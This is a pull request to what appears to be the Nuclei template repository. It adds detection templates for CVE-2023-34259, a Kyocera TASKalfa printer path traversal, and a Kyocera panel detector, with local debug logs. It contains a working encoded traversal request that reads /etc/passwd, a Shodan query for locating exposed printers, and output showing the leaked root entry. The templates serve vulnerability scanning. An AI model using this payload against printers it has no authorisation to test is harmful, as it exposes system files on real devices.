### PR TITLE
Create CVE-2023-34259

### DIFF
--- a/http/cves/2023/CVE-2023-34259.yaml
+++ b/http/cves/2023/CVE-2023-34259.yaml
@@ -1,0 +1,36 @@
+id: CVE-2023-34259
+
+info:
+  name: Kyocera TASKalfa printer - Path Traversal
+  author: gy741
+  severity: high
+  description: |
+    CCRX has a Path Traversal vulnerability. Path Traversal is an attack on web applications. By manipulating the value of the file path, an attacker can gain access to the file system, including source code and critical system settings.
+  remediation: |
+    Upgrade to the latest version to mitigate this vulnerability.
+  reference:
+    - https://sec-consult.com/vulnerability-lab/advisory/path-traversal-bypass-denial-of-service-in-kyocera-printer/
+    - https://www.kyoceradocumentsolutions.com/en/our-business/security/information/2023-07-14.html
+    - https://packetstormsecurity.com/files/173397/Kyocera-TASKalfa-4053ci-2VG_S000.002.561-Path-Traversal-Denial-Of-Service.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2023-34259
+    cwe-id: CWE-22
+  tags: cve,cve2023,kyocera,lfi,printer
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0"
+
+      - type: status
+        status:
+          - 200

--- a/http/cves/2023/CVE-2023-34259.yaml
+++ b/http/cves/2023/CVE-2023-34259.yaml
@@ -17,6 +17,10 @@ info:
     cvss-score: 7.5
     cve-id: CVE-2023-34259
     cwe-id: CWE-22
+  metadata:
+    max-request: 1
+    shodan-query: http.favicon.hash:-50306417
+    verified: true
   tags: cve,cve2023,kyocera,lfi,printer
 
 http:
@@ -30,6 +34,11 @@ http:
         part: body
         regex:
           - "root:.*:0:0"
+
+      - type: word
+        part: server
+        words:
+          - "KM-MFP"
 
       - type: status
         status:

--- a/http/exposed-panels/kyocera-printer-detect.yaml
+++ b/http/exposed-panels/kyocera-printer-detect.yaml
@@ -1,0 +1,23 @@
+id: kyocera-printer-detect
+
+info:
+  name: Kyocera Printer Panel - Detect
+  author: gy741
+  severity: info
+  description: Kyocera printer panel was detected.
+  tags: iot,panel,kyocera,printer
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '/startwlm/Start_Wlm.htm'
+
+      - type: status
+        status:
+          - 200

--- a/http/iot/kyocera-printer-panel.yaml
+++ b/http/iot/kyocera-printer-panel.yaml
@@ -1,20 +1,26 @@
-id: kyocera-printer-detect
+id: kyocera-printer-panel
 
 info:
   name: Kyocera Printer Panel - Detect
   author: gy741
   severity: info
-  description: Kyocera printer panel was detected.
+  description: |
+    Kyocera printer panel was detected.
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: http.favicon.hash:-50306417
   tags: iot,panel,kyocera,printer
 
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/"
+      - "{{BaseURL}}"
 
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
           - '/startwlm/Start_Wlm.htm'
 


### PR DESCRIPTION
### Template / PR Information

Hello,

Added CVE-2023-34259.

Insufficient CVE information. Please keep in mind.

- References: https://sec-consult.com/vulnerability-lab/advisory/path-traversal-bypass-denial-of-service-in-kyocera-printer/

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


```
$  nuclei -t CVE-2023-34259.yaml -u https://127.0.0.1 --debug

GET /wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [CVE-2023-34259] Dumped HTTP response https://127.0.0.1/wlmdeu/../../../../../../../../../../../etc/passwd%00index.htm

HTTP/1.1 200 OK
Content-Length: 770
Accept-Encoding: identity
Content-Type: text/html
Date: Sun, 08 Oct 2023 08:57:38 GMT
Etag: "/wlmdeu/../../../../../../../../../../../etc/passwd, Fri, 06 Oct 2023 05:46:21 GMT"
Last-Modified: Fri, 06 Oct 2023 05:46:21 GMT
Server: KM-MFP-http/V0.0.1

root:x:0:0:root:/root:/bin/sh
....
....
[CVE-2023-34259:regex-1] [http] [high] https://127.0.0.1/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm
[CVE-2023-34259:status-2] [http] [high] https://127.0.0.1/wlmdeu%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00index.htm
```

```
$ nuclei -t kyocera-printer-detect.yaml -u https://127.0.0.1 --debug

GET / HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [kyocera-printer-detect] Dumped HTTP response https://127.0.0.1/

HTTP/1.1 200 OK
Content-Length: 5165
Accept-Encoding: identity
Cache-Control: no-cache
Content-Type: text/html; charset=UTF-8
Date: Sun, 08 Oct 2023 09:05:21 GMT
Etag:
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Server: KM-MFP-http/V0.0.1
Set-Cookie: rtl=0; path=/;

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<html dir="ltr">
<head>

<meta http-equiv="X-UA-Compatible" content="IE=edge">

....
....
<frameset border="0" frameborder="NO" framespacing="0">
<frame name="wlmframe" src="/startwlm/Start_Wlm.htm">
</frameset>

</html>
[kyocera-printer-detect:word-1] [http] [info] https://127.0.0.1/
[kyocera-printer-detect:status-2] [http] [info] https://127.0.0.1/

```